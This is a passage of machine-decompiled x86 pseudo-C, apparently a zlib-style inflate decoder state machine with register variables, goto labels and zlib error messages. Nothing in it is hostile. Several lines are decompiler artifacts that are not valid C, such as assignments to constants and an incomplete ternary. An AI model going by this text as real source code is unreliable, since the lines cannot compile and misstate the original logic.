                                                                                                          																 *(__ebx + 0x58) = 6;
                                                                                                          																__eax = __ebx + ( *(__ebx + 0x60) + 0x38) * 2;
                                                                                                          																__eax = E008833B4(2, __ebx + ( *(__ebx + 0x60) + 0x38) * 2,  *(__ebx + 0x64), __ecx, __edx, __ebx + 0x2f0);
                                                                                                          																_v36 = __eax;
                                                                                                          																__eflags = __eax;
                                                                                                          																if(__eax == 0) {
                                                                                                          																	__eflags = _a8 - 6;
                                                                                                          																	__ecx = _v8;
                                                                                                          																	 *__ebx = 0x13;
                                                                                                          																	if(_a8 == 6) {
                                                                                                          																		goto L332;
                                                                                                          																	}
                                                                                                          																	__edx = _v16;
                                                                                                          																	goto L246;
                                                                                                          																}
                                                                                                          																 *(__esi + 0x18) = "invalid distances set";
                                                                                                          																L204:
                                                                                                          																 *__ebx = 0x1d;
                                                                                                          																goto L141;
                                                                                                          															}
                                                                                                          															 *(__esi + 0x18) = "invalid literal/lengths set";
                                                                                                          															goto L204;
                                                                                                          														}
                                                                                                          														 *(__esi + 0x18) = "invalid code -- missing end-of-block";
                                                                                                          														goto L204;
                                                                                                          													}
                                                                                                          													__ecx = _v52;
                                                                                                          													__eflags = __ecx;
                                                                                                          													if(__ecx == 0) {
                                                                                                          														continue;
                                                                                                          													}
                                                                                                          													__edx = _v56;
                                                                                                          													do {
                                                                                                          														__eax =  *(__ebx + 0x68);
                                                                                                          														 *((short*)(__ebx + 0x70 +  *(__ebx + 0x68) * 2)) = __dx;
                                                                                                          														 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                          														__ecx = __ecx - 1;
                                                                                                          														__eflags = __ecx;
                                                                                                          													} while (__ecx != 0);
                                                                                                          													continue;
                                                                                                          												}
                                                                                                          												_v20 = __ecx;
                                                                                                          												while(1) {
                                                                                                          													_t443 = __ecx + 3; // 0x14
                                                                                                          													__eax = _t443;
                                                                                                          													__eflags = __edi - _t443;
                                                                                                          													if(__edi >= _t443) {
                                                                                                          														break;
                                                                                                          													}
                                                                                                          													__ecx = _v8;
                                                                                                          													__eflags = __ecx;
                                                                                                          													if(__ecx == 0) {
                                                                                                          														goto L332;
                                                                                                          													}
                                                                                                          													__eax = _v12;
                                                                                                          													_v8 = __ecx;
                                                                                                          													__ecx = __edi;
                                                                                                          													 *_v12 & 0x000000ff = ( *_v12 & 0x000000ff) << __cl;
                                                                                                          													__ecx = _v20;
                                                                                                          													__edx = __edx + (( *_v12 & 0x000000ff) << __cl);
                                                                                                          													_v12 = _v12 + 1;
                                                                                                          													__edi = __edi + 8;
                                                                                                          													_v16 = __edx;
                                                                                                          												}
                                                                                                          												__edx = __edx >> __cl;
                                                                                                          												__ecx = __edx;
                                                                                                          												__edx = __edx >> 3;
                                                                                                          												__ecx = __ecx & 0x00000007;
                                                                                                          												_push(0xfffffffd);
                                                                                                          												_pop(__eax);
                                                                                                          												__ecx = __ecx + 3;
                                                                                                          												__eax = __eax - _v20;
                                                                                                          												goto L228;
                                                                                                          											}
                                                                                                          											__eax = __eax >> 8;
                                                                                                          											__ecx = __cl & 0x000000ff;
                                                                                                          											__ecx = (__cl & 0x000000ff) + 2;
                                                                                                          											_v56 = __ecx;
                                                                                                          											__eflags = __edi - __ecx;
                                                                                                          											if(__edi >= __ecx) {
                                                                                                          												L215:
                                                                                                          												__edx = _v16;
                                                                                                          												__ecx = __ah & 0x000000ff;
                                                                                                          												__eax = _v48;
                                                                                                          												__edi = __edi - __ecx;
                                                                                                          												__edx = _v16 >> __cl;
                                                                                                          												_v16 = __edx;
                                                                                                          												_v20 = __edi;
                                                                                                          												__eflags = __eax;
                                                                                                          												if(__eax == 0) {
                                                                                                          													 *(__esi + 0x18) = "invalid bit length repeat";
                                                                                                          													goto L25;
                                                                                                          												}
                                                                                                          												__eax =  *(__ebx + 0x6e + __eax * 2) & 0x0000ffff;
                                                                                                          												__ecx = __edx;
                                                                                                          												__ecx = __edx & 0x00000003;
                                                                                                          												__edx = __edx >> 2;
                                                                                                          												__ecx = __ecx + 3;
                                                                                                          												_v56 = __eax;
                                                                                                          												__edi = __edi - 2;
                                                                                                          												goto L229;
                                                                                                          											} else {
                                                                                                          												goto L213;
                                                                                                          											}
                                                                                                          											while(1) {
                                                                                                          												L213:
                                                                                                          												__ecx = _v8;
                                                                                                          												__eflags = __ecx;
                                                                                                          												if(__ecx == 0) {
                                                                                                          													goto L332;
                                                                                                          												}
                                                                                                          												_v8 = __ecx;
                                                                                                          												__ecx = _v12;
                                                                                                          												__edx =  *_v12 & 0x000000ff;
                                                                                                          												__ecx = __edi;
                                                                                                          												__edx = ( *_v12 & 0x000000ff) << __cl;
                                                                                                          												__edi = __edi + 8;
                                                                                                          												_v16 = _v16 + (( *_v12 & 0x000000ff) << __cl);
                                                                                                          												_v12 = _v12 + 1;
                                                                                                          												__eflags = __edi - _v56;
                                                                                                          												if(__edi < _v56) {
                                                                                                          													continue;
                                                                                                          												}
                                                                                                          												goto L215;
                                                                                                          											}
                                                                                                          											goto L332;
                                                                                                          										}
                                                                                                          										__eax = __eax >> 8;
                                                                                                          										__ecx = __al & 0x000000ff;
                                                                                                          										__eax = _v48;
                                                                                                          										__edi = __edi - (__al & 0x000000ff);
                                                                                                          										_v16 = _v16 >> __cl;
                                                                                                          										_v20 = __edi;
                                                                                                          										 *((short*)(__ebx + 0x70 + _v48 * 2)) = __dx;
                                                                                                          										 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                          									}
                                                                                                          									goto L237;
                                                                                                          								case 0x13:
                                                                                                          									L246:
                                                                                                          									 *__ebx = 0x14;
                                                                                                          									goto L247;
                                                                                                          								case 0x14:
                                                                                                          									L247:
                                                                                                          									__eflags = __ecx - 6;
                                                                                                          									if(__ecx < 6) {
                                                                                                          										L251:
                                                                                                          										__eax =  *(__ebx + 0x4c);
                                                                                                          										__ecx =  *(__ebx + 0x54);
                                                                                                          										 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) & 0x00000000;
                                                                                                          										_v52 =  *(__ebx + 0x4c);
                                                                                                          										0 = 1;
                                                                                                          										__eax = 1 << __cl;
                                                                                                          										__ecx =  *(__ebx + 0x4c);
                                                                                                          										__eax = (1 << __cl) - 1;
                                                                                                          										__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                          										__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 & __edx) * 4);
                                                                                                          										while(1) {
                                                                                                          											__eax = __eax >> 8;
                                                                                                          											__ecx = __cl & 0x000000ff;
                                                                                                          											__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                          											if((__cl & 0x000000ff) <= __edi) {
                                                                                                          												break;
                                                                                                          											}
                                                                                                          											__ecx = _v8;
                                                                                                          											__eflags = __ecx;
                                                                                                          											if(__ecx == 0) {
                                                                                                          												goto L332;
                                                                                                          											}
                                                                                                          											__eax = _v12;
                                                                                                          											_v8 = __ecx;
                                                                                                          											__ecx = __edi;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											_v20 = __edi;
                                                                                                          											 *_v12 & 0x000000ff = ( *_v12 & 0x000000ff) << __cl;
                                                                                                          											__ecx =  *(__ebx + 0x54);
                                                                                                          											__edx = __edx + (( *_v12 & 0x000000ff) << __cl);
                                                                                                          											_v12 = _v12 + 1;
                                                                                                          											__eax =  *(__ebx + 0x4c);
                                                                                                          											_v16 = __edx;
                                                                                                          											0 = 1;
                                                                                                          											1 << __cl = (1 << __cl) - 1;
                                                                                                          											__edx = (1 << __cl) - 0x00000001 & _v16;
                                                                                                          											__eflags = 1;
                                                                                                          											__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 & _v16) * 4);
                                                                                                          											__edx = _v16;
                                                                                                          										}
                                                                                                          										__eflags = __al;
                                                                                                          										if(__al == 0) {
                                                                                                          											L261:
                                                                                                          											__eax = __eax >> 8;
                                                                                                          											__ecx = __cl & 0x000000ff;
                                                                                                          											 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                          											__edi = __edi - __ecx;
                                                                                                          											__edx = __edx >> __cl;
                                                                                                          											__ecx = __eax;
                                                                                                          											__ecx = __eax >> 0x10;
                                                                                                          											_v16 = __edx;
                                                                                                          											_v20 = __edi;
                                                                                                          											 *(__ebx + 0x40) = __ecx;
                                                                                                          											__eflags = __al;
                                                                                                          											if(__al != 0) {
                                                                                                          												__eflags = __al & 0x00000020;
                                                                                                          												if((__al & 0x00000020) == 0) {
                                                                                                          													__ecx = _v8;
                                                                                                          													__eflags = __al & 0x00000040;
                                                                                                          													if((__al & 0x00000040) == 0) {
                                                                                                          														__eax = __al & 0x000000ff;
                                                                                                          														__eax = __al & 0xf;
                                                                                                          														__eflags = __eax;
                                                                                                          														 *__ebx = 0x15;
                                                                                                          														 *(__ebx + 0x48) = __eax;
                                                                                                          														goto L268;
                                                                                                          													}
                                                                                                          													 *(__esi + 0x18) = "invalid literal/length code";
                                                                                                          													L39:
                                                                                                          													 *__ebx = 0x1d;
                                                                                                          													goto L143;
                                                                                                          												}
                                                                                                          												 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) | 0xffffffff;
                                                                                                          												 *__ebx = 0xb;
                                                                                                          												goto L142;
                                                                                                          											}
                                                                                                          											 *__ebx = 0x19;
                                                                                                          											goto L142;
                                                                                                          										}
                                                                                                          										__eflags = __al & 0x000000f0;
                                                                                                          										if((__al & 0x000000f0) != 0) {
                                                                                                          											goto L261;
                                                                                                          										}
                                                                                                          										__edi = 0;
                                                                                                          										__ecx = __al & 0x000000ff;
                                                                                                          										__ebx = __eax;
                                                                                                          										__edi = 1;
                                                                                                          										__ebx = __eax >> 8;
                                                                                                          										__edx = __eax;
                                                                                                          										__esi = __bl & 0x000000ff;
                                                                                                          										__ecx = (__al & 0x000000ff) + __esi;
                                                                                                          										__eax = __eax >> 0x10;
                                                                                                          										__edi = 1 << __cl;
                                                                                                          										__ecx = __esi;
                                                                                                          										__edi = (1 << __cl) - 1;
                                                                                                          										_v56 = __edx;
                                                                                                          										(1 << __cl) - 0x00000001 & _v16 = ((1 << __cl) - 0x00000001 & _v16) >> __cl;
                                                                                                          										__ecx = _v52;
                                                                                                          										__edi = (((1 << __cl) - 0x00000001 & _v16) >> __cl) + __eax;
                                                                                                          										__eax =  *((intOrPtr*)(_v52 + ((((1 << __cl) - 0x00000001 & _v16) >> __cl) + __eax) * 4));
                                                                                                          										__ecx = __eax;
                                                                                                          										__edi = _v20;
                                                                                                          										__ecx = __eax >> 8;
                                                                                                          										__esi = __cl & 0x000000ff;
                                                                                                          										__ecx = __bl & 0x000000ff;
                                                                                                          										__ebx = _v40;
                                                                                                          										__esi = (__cl & 0x000000ff) + (__bl & 0x000000ff);
                                                                                                          										__eflags = (__cl & 0x000000ff) + (__bl & 0x000000ff) - __edi;
                                                                                                          										if((__cl & 0x000000ff) + (__bl & 0x000000ff) <= __edi) {
                                                                                                          											L260:
                                                                                                          											__esi = _a4;
                                                                                                          											__ecx = __dh & 0x000000ff;
                                                                                                          											__edx = _v16;
                                                                                                          											__edx = _v16 >> __cl;
                                                                                                          											__edi = __edi - __ecx;
                                                                                                          											__eflags = __edi;
                                                                                                          											 *(__ebx + 0x1bc4) = __ecx;
                                                                                                          											goto L261;
                                                                                                          										} else {
                                                                                                          											goto L258;
                                                                                                          										}
                                                                                                          										while(1) {
                                                                                                          											L258:
                                                                                                          											__esi = _v8;
                                                                                                          											__eflags = __esi;
                                                                                                          											if(__esi == 0) {
                                                                                                          												goto L331;
                                                                                                          											}
                                                                                                          											__esi = __esi - 1;
                                                                                                          											__ecx = __edi;
                                                                                                          											_v8 = __esi;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											__esi = _v12;
                                                                                                          											_v20 = __edi;
                                                                                                          											__edi = __dh & 0x000000ff;
                                                                                                          											 *__esi & 0x000000ff = ( *__esi & 0x000000ff) << __cl;
                                                                                                          											_v16 = _v16 + (( *__esi & 0x000000ff) << __cl);
                                                                                                          											__esi = __esi + 1;
                                                                                                          											__eax = _v54 & 0x0000ffff;
                                                                                                          											_v12 = __esi;
                                                                                                          											0 = 1;
                                                                                                          											__dl & 0x000000ff = (__dl & 0x000000ff) + __edi;
                                                                                                          											__esi = 1 << __cl;
                                                                                                          											__ecx = __edi;
                                                                                                          											(1 << __cl) - 1 = (1 << __cl) - 0x00000001 & _v16;
                                                                                                          											__esi = ((1 << __cl) - 0x00000001 & _v16) >> __cl;
                                                                                                          											__esi = (((1 << __cl) - 0x00000001 & _v16) >> __cl) + (_v54 & 0x0000ffff);
                                                                                                          											__eax =  *(__ebx + 0x4c);
                                                                                                          											__eax =  *( *(__ebx + 0x4c) + ((((1 << __cl) - 0x00000001 & _v16) >> __cl) + (_v54 & 0x0000ffff)) * 4);
                                                                                                          											__eax = __eax >> 8;
                                                                                                          											__ecx = __cl & 0x000000ff;
                                                                                                          											__ecx = (__cl & 0x000000ff) + __edi;
                                                                                                          											__edi = _v20;
                                                                                                          											__eflags = __ecx - __edi;
                                                                                                          											if(__ecx > __edi) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											goto L260;
                                                                                                          										}
                                                                                                          										goto L331;
                                                                                                          									}
                                                                                                          									__eax = _v28;
                                                                                                          									__eflags = __eax - 0x102;
                                                                                                          									if(__eax < 0x102) {
                                                                                                          										goto L251;
                                                                                                          									}
                                                                                                          									__ebx = _v32;
                                                                                                          									_push(_v44);
                                                                                                          									 *(__esi + 0xc) = _v32;
                                                                                                          									__ebx = _v40;
                                                                                                          									 *(__esi + 0x10) = __eax;
                                                                                                          									__eax = _v12;
                                                                                                          									 *__esi = _v12;
                                                                                                          									 *(__esi + 4) = __ecx;
                                                                                                          									_push(__esi);
                                                                                                          									 *(__ebx + 0x38) = __edx;
                                                                                                          									 *(__ebx + 0x3c) = __edi;
                                                                                                          									__eax = E00883840();
                                                                                                          									__eflags =  *__ebx - 0xb;
                                                                                                          									__eax =  *(__esi + 0xc);
                                                                                                          									__edx =  *(__ebx + 0x38);
                                                                                                          									__edi =  *(__ebx + 0x3c);
                                                                                                          									_pop(__ecx);
                                                                                                          									_v32 =  *(__esi + 0xc);
                                                                                                          									__eax =  *(__esi + 0x10);
                                                                                                          									_pop(__ecx);
                                                                                                          									__ecx =  *(__esi + 4);
                                                                                                          									_v28 =  *(__esi + 0x10);
                                                                                                          									__eax =  *__esi;
                                                                                                          									_v12 =  *__esi;
                                                                                                          									_v8 = __ecx;
                                                                                                          									_v16 = __edx;
                                                                                                          									_v20 = __edi;
                                                                                                          									if( *__ebx == 0xb) {
                                                                                                          										 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) | 0xffffffff;
                                                                                                          									}
                                                                                                          									goto L143;
                                                                                                          								case 0x15:
                                                                                                          									L268:
                                                                                                          									__esi =  *(__ebx + 0x48);
                                                                                                          									__eflags = __esi;
                                                                                                          									if(__esi == 0) {
                                                                                                          										L274:
                                                                                                          										__eax =  *(__ebx + 0x40);
                                                                                                          										 *(__ebx + 0x1bc8) =  *(__ebx + 0x40);
                                                                                                          										 *__ebx = 0x16;
                                                                                                          										goto L275;
                                                                                                          									}
                                                                                                          									__eflags = __edi - __esi;
                                                                                                          									if(__edi >= __esi) {
                                                                                                          										L273:
                                                                                                          										__eax = 0;
                                                                                                          										__ecx = __esi;
                                                                                                          										__eax = 1;
                                                                                                          										__edi = __edi - __esi;
                                                                                                          										1 << __cl = (1 << __cl) - 1;
                                                                                                          										_v20 = __edi;
                                                                                                          										__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                          										__edx = __edx >> __cl;
                                                                                                          										 *(__ebx + 0x40) =  *(__ebx + 0x40) + __eax;
                                                                                                          										_t601 = __ebx + 0x1bc4;
                                                                                                          										 *_t601 =  *(__ebx + 0x1bc4) + __esi;
                                                                                                          										__eflags =  *_t601;
                                                                                                          										_v16 = __edx;
                                                                                                          										goto L274;
                                                                                                          									}
                                                                                                          									__eax = _v12;
                                                                                                          									while(1) {
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L331;
                                                                                                          										}
                                                                                                          										__eax =  *__eax & 0x000000ff;
                                                                                                          										_v8 = __ecx;
                                                                                                          										__ecx = __edi;
                                                                                                          										__eax = __eax << __cl;
                                                                                                          										__edi = __edi + 8;
                                                                                                          										__ecx = _v8;
                                                                                                          										__edx = __edx + __eax;
                                                                                                          										__eax = _v12;
                                                                                                          										__eax = _v12 + 1;
                                                                                                          										_v16 = __edx;
                                                                                                          										_v12 = __eax;
                                                                                                          										__eflags = __edi - __esi;
                                                                                                          										if(__edi < __esi) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L273;
                                                                                                          									}
                                                                                                          									goto L331;
                                                                                                          								case 0x16:
                                                                                                          									L275:
                                                                                                          									__ecx =  *(__ebx + 0x58);
                                                                                                          									__eax = 0;
                                                                                                          									__esi =  *(__ebx + 0x50);
                                                                                                          									1 = 1 << __cl;
                                                                                                          									__eax = (1 << __cl) - 1;
                                                                                                          									_v52 = __esi;
                                                                                                          									__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                          									__eax =  *(__esi + ((1 << __cl) - 0x00000001 & __edx) * 4);
                                                                                                          									1 = 1 >> 8;
                                                                                                          									__ecx = __cl & 0x000000ff;
                                                                                                          									__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                          									if((__cl & 0x000000ff) <= __edi) {
                                                                                                          										L279:
                                                                                                          										__eflags = __al & 0x000000f0;
                                                                                                          										if((__al & 0x000000f0) != 0) {
                                                                                                          											L284:
                                                                                                          											__esi = _a4;
                                                                                                          											__eax = __eax >> 8;
                                                                                                          											__ecx = __cl & 0x000000ff;
                                                                                                          											 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                          											__edi = __edi - __ecx;
                                                                                                          											__edx = __edx >> __cl;
                                                                                                          											_v16 = __edx;
                                                                                                          											_v20 = __edi;
                                                                                                          											__eflags = __al & 0x00000040;
                                                                                                          											if((__al & 0x00000040) == 0) {
                                                                                                          												__ecx = __eax;
                                                                                                          												 *__ebx = 0x17;
                                                                                                          												__ecx = __eax >> 0x10;
                                                                                                          												__eax = __al & 0x000000ff;
                                                                                                          												__eax = __al & 0xf;
                                                                                                          												__eflags = __eax;
                                                                                                          												 *(__ebx + 0x44) = __ecx;
                                                                                                          												 *(__ebx + 0x48) = __eax;
                                                                                                          												goto L287;
                                                                                                          											}
                                                                                                          											 *(__esi + 0x18) = "invalid distance code";
                                                                                                          											goto L25;
                                                                                                          										}
                                                                                                          										__edi = 0;
                                                                                                          										__ecx = __al & 0x000000ff;
                                                                                                          										__ebx = __eax;
                                                                                                          										__edi = 1;
                                                                                                          										__ebx = __eax >> 8;
                                                                                                          										__edx = __eax;
                                                                                                          										__esi = __bl & 0x000000ff;
                                                                                                          										__ecx = (__al & 0x000000ff) + __esi;
                                                                                                          										__eax = __eax >> 0x10;
                                                                                                          										__edi = 1 << __cl;
                                                                                                          										__ecx = __esi;
                                                                                                          										__edi = (1 << __cl) - 1;
                                                                                                          										_v56 = __edx;
                                                                                                          										(1 << __cl) - 0x00000001 & _v16 = ((1 << __cl) - 0x00000001 & _v16) >> __cl;
                                                                                                          										__ecx = _v52;
                                                                                                          										__edi = (((1 << __cl) - 0x00000001 & _v16) >> __cl) + __eax;
                                                                                                          										__eax =  *(_v52 + ((((1 << __cl) - 0x00000001 & _v16) >> __cl) + __eax) * 4);
                                                                                                          										__ecx = __eax;
                                                                                                          										__edi = _v20;
                                                                                                          										__ecx = __eax >> 8;
                                                                                                          										__esi = __cl & 0x000000ff;
                                                                                                          										__ecx = __bl & 0x000000ff;
                                                                                                          										__ebx = _v40;
                                                                                                          										__esi = (__cl & 0x000000ff) + (__bl & 0x000000ff);
                                                                                                          										__eflags = (__cl & 0x000000ff) + (__bl & 0x000000ff) - __edi;
                                                                                                          										if((__cl & 0x000000ff) + (__bl & 0x000000ff) <= __edi) {
                                                                                                          											L283:
                                                                                                          											__ecx = __dh & 0x000000ff;
                                                                                                          											__edx = _v16;
                                                                                                          											__edi = __edi - __ecx;
                                                                                                          											__edx = _v16 >> __cl;
                                                                                                          											_t647 = __ebx + 0x1bc4;
                                                                                                          											 *_t647 =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                          											__eflags =  *_t647;
                                                                                                          											goto L284;
                                                                                                          										} else {
                                                                                                          											goto L281;
                                                                                                          										}
                                                                                                          										while(1) {
                                                                                                          											L281:
                                                                                                          											__esi = _v8;
                                                                                                          											__eflags = __esi;
                                                                                                          											if(__esi == 0) {
                                                                                                          												goto L331;
                                                                                                          											}
                                                                                                          											__esi = __esi - 1;
                                                                                                          											__ecx = __edi;
                                                                                                          											_v8 = __esi;
                                                                                                          											__edi = __edi + 8;
                                                                                                          											__esi = _v12;
                                                                                                          											_v20 = __edi;
                                                                                                          											__edi = __dh & 0x000000ff;
                                                                                                          											 *__esi & 0x000000ff = ( *__esi & 0x000000ff) << __cl;
                                                                                                          											_v16 = _v16 + (( *__esi & 0x000000ff) << __cl);
                                                                                                          											__esi = __esi + 1;
                                                                                                          											__eax = _v54 & 0x0000ffff;
                                                                                                          											_v12 = __esi;
                                                                                                          											0 = 1;
                                                                                                          											__dl & 0x000000ff = (__dl & 0x000000ff) + __edi;
                                                                                                          											__esi = 1 << __cl;
                                                                                                          											__ecx = __edi;
                                                                                                          											(1 << __cl) - 1 = (1 << __cl) - 0x00000001 & _v16;
                                                                                                          											__esi = ((1 << __cl) - 0x00000001 & _v16) >> __cl;
                                                                                                          											__esi = (((1 << __cl) - 0x00000001 & _v16) >> __cl) + (_v54 & 0x0000ffff);
                                                                                                          											__eax =  *(__ebx + 0x50);
                                                                                                          											__eax =  *( *(__ebx + 0x50) + ((((1 << __cl) - 0x00000001 & _v16) >> __cl) + (_v54 & 0x0000ffff)) * 4);
                                                                                                          											__eax = __eax >> 8;
                                                                                                          											__ecx = __cl & 0x000000ff;
                                                                                                          											__ecx = (__cl & 0x000000ff) + __edi;
                                                                                                          											__edi = _v20;
                                                                                                          											__eflags = __ecx - __edi;
                                                                                                          											if(__ecx > __edi) {
                                                                                                          												continue;
                                                                                                          											}
                                                                                                          											goto L283;
                                                                                                          										}
                                                                                                          										goto L331;
                                                                                                          									}
                                                                                                          									__esi = _v8;
                                                                                                          									while(1) {
                                                                                                          										__eflags = __esi;
                                                                                                          										if(__esi == 0) {
                                                                                                          											goto L331;
                                                                                                          										}
                                                                                                          										__eax = _v12;
                                                                                                          										__ecx = __edi;
                                                                                                          										__esi = __esi - 1;
                                                                                                          										__edi = __edi + 8;
                                                                                                          										_v8 = __esi;
                                                                                                          										_v20 = __edi;
                                                                                                          										 *_v12 & 0x000000ff = ( *_v12 & 0x000000ff) << __cl;
                                                                                                          										__ecx =  *(__ebx + 0x58);
                                                                                                          										__edx = __edx + (( *_v12 & 0x000000ff) << __cl);
                                                                                                          										_v12 = _v12 + 1;
                                                                                                          										__eax =  *(__ebx + 0x50);
                                                                                                          										_v16 = __edx;
                                                                                                          										0 = 1;
                                                                                                          										1 << __cl = (1 << __cl) - 1;
                                                                                                          										__edx = (1 << __cl) - 0x00000001 & _v16;
                                                                                                          										__eax =  *( *(__ebx + 0x50) + ((1 << __cl) - 0x00000001 & _v16) * 4);
                                                                                                          										__ecx = __eax;
                                                                                                          										__edx = _v16;
                                                                                                          										__eax >> 8 = __cl & 0x000000ff;
                                                                                                          										__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                          										if((__cl & 0x000000ff) > __edi) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L279;
                                                                                                          									}
                                                                                                          									goto L331;
                                                                                                          								case 0x17:
                                                                                                          									L287:
                                                                                                          									__ecx =  *(__ebx + 0x48);
                                                                                                          									__eflags = __ecx;
                                                                                                          									if(__ecx == 0) {
                                                                                                          										L293:
                                                                                                          										 *__ebx = 0x18;
                                                                                                          										goto L294;
                                                                                                          									}
                                                                                                          									__eflags = __edi - __ecx;
                                                                                                          									if(__edi >= __ecx) {
                                                                                                          										L292:
                                                                                                          										__eax = 0;
                                                                                                          										__edi = __edi - __ecx;
                                                                                                          										__eax = 1;
                                                                                                          										_v20 = __edi;
                                                                                                          										1 << __cl = (1 << __cl) - 1;
                                                                                                          										__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                          										__edx = __edx >> __cl;
                                                                                                          										 *(__ebx + 0x44) =  *(__ebx + 0x44) + __eax;
                                                                                                          										_t670 = __ebx + 0x1bc4;
                                                                                                          										 *_t670 =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                          										__eflags =  *_t670;
                                                                                                          										_v16 = __edx;
                                                                                                          										goto L293;
                                                                                                          									}
                                                                                                          									__eax = _v12;
                                                                                                          									while(1) {
                                                                                                          										__ecx = _v8;
                                                                                                          										__eflags = __ecx;
                                                                                                          										if(__ecx == 0) {
                                                                                                          											goto L332;
                                                                                                          										}
                                                                                                          										__eax =  *__eax & 0x000000ff;
                                                                                                          										_v8 = __ecx;
                                                                                                          										__ecx = __edi;
                                                                                                          										__eax = __eax << __cl;
                                                                                                          										__edi = __edi + 8;
                                                                                                          										__ecx =  *(__ebx + 0x48);
                                                                                                          										__edx = __edx + __eax;
                                                                                                          										__eax = _v12;
                                                                                                          										__eax = _v12 + 1;
                                                                                                          										_v16 = __edx;
                                                                                                          										_v12 = __eax;
                                                                                                          										__eflags = __edi - __ecx;
                                                                                                          										if(__edi < __ecx) {
                                                                                                          											continue;
                                                                                                          										}
                                                                                                          										goto L292;
                                                                                                          									}
                                                                                                          									goto L332;
                                                                                                          								case 0x18:
                                                                                                          									L294:
                                                                                                          									__ecx = _v28;
                                                                                                          									__eflags = __ecx;
                                                                                                          									if(__ecx == 0) {
                                                                                                          										goto L331;
                                                                                                          									}
                                                                                                          									__eax = _v44;
                                                                                                          									__eax = _v44 - __ecx;
                                                                                                          									__ecx =  *(__ebx + 0x44);
                                                                                                          									__eflags = __ecx - __eax;
                                                                                                          									if(__ecx <= __eax) {
                                                                                                          										__eax = _v32;
                                                                                                          										__eax = _v32 - __ecx;
                                                                                                          										__eflags = __eax;
                                                                                                          										_v56 = __eax;
                                                                                                          										__eax =  *(__ebx + 0x40);
                                                                                                          										L305:
                                                                                                          										__ecx = __eax;
                                                                                                          										L306:
                                                                                                          										__esi = _v28;
                                                                                                          										__eflags = __ecx - __esi;
                                                                                                          										__ecx =  >  ? __esi : __ecx;
                                                                                                          										__esi = __esi - __ecx;
                                                                                                          										__eax = __eax - __ecx;
                                                                                                          										_v28 = __esi;
                                                                                                          										__esi = _v56;
                                                                                                          										 *(__ebx + 0x40) = __eax;
                                                                                                          										__ebx = _v32;
                                                                                                          										__esi = _v56 - __ebx;
                                                                                                          										__eflags = __esi;
                                                                                                          										do {
                                                                                                          											__al =  *((intOrPtr*)(__esi + __ebx));
                                                                                                          											 *__ebx = __al;
                                                                                                          											__ebx = __ebx + 1;
                                                                                                          											__ecx = __ecx - 1;
                                                                                                          											__eflags = __ecx;
                                                                                                          										} while (__ecx != 0);
                                                                                                          										__esi = _a4;
                                                                                                          										_v32 = __ebx;
                                                                                                          										__ebx = _v40;
                                                                                                          										__eflags =  *(__ebx + 0x40) - __ecx;
                                                                                                          										if( *(__ebx + 0x40) == __ecx) {
                                                                                                          											 *__ebx = 0x14;
                                                                                                          										}
                                                                                                          										goto L142;
                                                                                                          									}
                                                                                                          									__ecx = __ecx - __eax;
                                                                                                          									__eflags = __ecx -  *((intOrPtr*)(__ebx + 0x2c));
                                                                                                          									if(__ecx <=  *((intOrPtr*)(__ebx + 0x2c))) {
                                                                                                          										L299:
                                                                                                          										__eax =  *(__ebx + 0x34);
                                                                                                          										__eflags = __ecx -  *((intOrPtr*)(__ebx + 0x30));
                                                                                                          										if(__ecx <=  *((intOrPtr*)(__ebx + 0x30))) {
                                                                                                          											__eax = __eax - __ecx;
                                                                                                          											__eax = __eax +  *((intOrPtr*)(__ebx + 0x30));
                                                                                                          											__eflags = __eax;
                                                                                                          										} else {
                                                                                                          											__ecx = __ecx -  *((intOrPtr*)(__ebx + 0x30));
                                                                                                          											__eax = __eax +  *((intOrPtr*)(__ebx + 0x28));
                                                                                                          											__eax = __eax - __ecx;
                                                                                                          										}
                                                                                                          										_v56 = __eax;
                                                                                                          										__eax =  *(__ebx + 0x40);
                                                                                                          										__eflags = __ecx - __eax;
                                                                                                          										if(__ecx <= __eax) {
                                                                                                          											goto L306;
                                                                                                          										} else {
                                                                                                          											goto L305;
                                                                                                          										}
                                                                                                          									}
                                                                                                          									__eflags =  *(__ebx + 0x1bc0);
                                                                                                          									if( *(__ebx + 0x1bc0) == 0) {
                                                                                                          										goto L299;
                                                                                                          									}
                                                                                                          									 *(__esi + 0x18) = "invalid distance too far back";
                                                                                                          									goto L25;
                                                                                                          								case 0x19:
                                                                                                          									__eflags = _v28;
                                                                                                          									if(_v28 == 0) {
                                                                                                          										goto L331;
                                                                                                          									}
                                                                                                          									__esi = _v32;
                                                                                                          									__al =  *(__ebx + 0x40);
                                                                                                          									_v32 = _v32 + 1;
                                                                                                          									_v28 = _v28 - 1;
                                                                                                          									 *_v32 = __al;
                                                                                                          									__esi = _a4;
                                                                                                          									 *__ebx = 0x14;
                                                                                                          									goto L143;
                                                                                                          								case 0x1a:
                                                                                                          									__eflags =  *(__ebx + 8);
                                                                                                          									if ( *(__ebx + 8) == 0) goto L315;
                                                                                                          									__eflags = _v2097152004 & __bh;
                                                                                                          								case 0x1b:
                                                                                                          									__eax = 0;
                                                                                                          									__eflags =  *(__ebx + 8);
                                                                                                          									if( *(__ebx + 8) == 0) {
                                                                                                          										L327:
